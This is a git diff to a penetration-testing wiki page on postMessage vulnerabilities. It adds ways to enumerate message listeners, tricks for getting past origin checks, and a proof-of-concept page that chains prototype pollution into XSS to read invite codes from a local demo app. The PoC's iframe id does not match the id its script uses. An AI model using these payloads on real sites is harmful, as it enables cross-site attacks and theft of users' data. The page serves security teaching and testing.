diff --git a/.gitbook/assets/image (616).png b/.gitbook/assets/image (616).png
new file mode 100644
index 00000000..367ddebe
Binary files /dev/null and b/.gitbook/assets/image (616).png differ
diff --git a/.gitbook/assets/image (617).png b/.gitbook/assets/image (617).png
new file mode 100644
index 00000000..367ddebe
Binary files /dev/null and b/.gitbook/assets/image (617).png differ
diff --git a/pentesting-web/postmessage-vulnerabilities.md b/pentesting-web/postmessage-vulnerabilities.md
index 4bf39896..64a830c6 100644
--- a/pentesting-web/postmessage-vulnerabilities.md
+++ b/pentesting-web/postmessage-vulnerabilities.md
@@ -11,6 +11,7 @@ targetWindow.postMessage(message, targetOrigin, [transfer]);
 window.postMessage('{"__proto__":{"isAdmin":True}}', '*')
 
 # postMessage to an iframe with id "idframe"
+<iframe id="idframe" src="http://victim.com/"></iframe>
 document.getElementById('idframe').contentWindow.postMessage('{"__proto__":{"isAdmin":True}}', '*')
 
 # postMessage to an URL
@@ -58,13 +59,22 @@ window.addEventListener("message", (event) => {
 
 Note in this case how the **first thing** that the code is doing is **checking the origin**. This is terribly **important** mainly if the page is going to do **anything sensitive** with the received information \(like changing a password\). **If it doesn't check the origin, attackers can make victims send arbitrary data to this endpoints** and change the victims passwords \(in this example\).
 
-### addEventListener check origin bypasses
+### Enumeration
 
-Copied from [https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html)
+In order to **find event listeners** in the current page you can:
+
+* **Search** the JS code for ****`window.addEventListener`
+* **Execute** in the developer tools console: `getEventListeners(window)`
+
+![](../.gitbook/assets/image%20%28616%29.png)
+
+* Use a **browser extension** like [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta) or [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker). This browser extensions will **intercept all the messages** and show them to you.
+
+### addEventListener check origin bypasses
 
 * If **`indexOf()`** is used to **check** the **origin** of the PostMessage event, remember that it can be easily bypassed like in the following example: `("https://app-sj17.marketo.com").indexOf("https://app-sj17.ma")` 
 * If **`search()`** is used to **validate** the **origin** could be insecure. According to the docs of `String.prototype.search()`, the method **takes a regular repression** object instead of a string. If anything other than regexp is passed, it will get implicitly converted into a regexp. In regular expression, **a dot \(.\) is treated as a wildcard**. An attacker can take advantage of it and **use** a **special domain** instead of the official one to bypass the validation, like in: `"https://www.safedomain.com".search("www.s.fedomain.com")`. 
-* If **`escapeHtml`** function is used, the function does not create a `new` escaped object, instead it over-writes properties of the existing object. This means that if we are able to create an object with a controlled property that does not respond to `hasOwnProperty` it will not be escaped.
+* If **`escapeHtml`** function is used, the function does not create a `new` escaped object, instead it **overwrites properties** of the existing object. This means that if we are able to create an object with a controlled property that does not respond to `hasOwnProperty` it will not be escaped.
 
 ```javascript
 // Expected to fail:
@@ -79,9 +89,35 @@ result.message; // "'"<b>\"
 
 `File` object is perfect for this exploit as it has a read-only `name` property which is used by our template and will bypass `escapeHtml` function.
 
-## Tools
+### postMessage to Prototype Pollution and/or XSS
 
-{% embed url="https://github.com/benso-io/posta" %}
+In scenarios where the data sent through `postMessage` is executed by JS, you can **iframe** the **page** and **exploit** the **prototype pollution/XSS** sending the exploit via `postMessage`.
 
+Example of an exploit to abuse **Prototype Pollution and then XSS** through a `postMessage` to an `iframe`:
 
+```markup
+<html>
+<body>
+    <iframe id="idframe" src="http://127.0.0.1:21501/snippets/demo-3/embed"></iframe>
+    <script>
+        function get_code() {
+            document.getElementById('iframe_victim').contentWindow.postMessage('{"__proto__":{"editedbymod":{"username":"<img src=x onerror=\\\"fetch(\'http://127.0.0.1:21501/api/invitecodes\', {credentials: \'same-origin\'}).then(response => response.json()).then(data => {alert(data[\'result\'][0][\'code\']);})\\\" />"}}}','*');
+            document.getElementById('iframe_victim').contentWindow.postMessage(JSON.stringify("refresh"), '*');
+        }
+
+        setTimeout(get_code, 2000);
+    </script>
+</body>
+</html>
+```
+
+For **more information**:
+
+* Link to page about [**prototype pollution**](deserialization/nodejs-proto-prototype-pollution.md)\*\*\*\*
+* Link to page about [**XSS**](xss-cross-site-scripting/)\*\*\*\*
+* Link to page about [**client side prototype pollution to XSS**](deserialization/nodejs-proto-prototype-pollution.md#client-side-prototype-pollution-to-xss)\*\*\*\*
+
+## References
+
+* [https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html)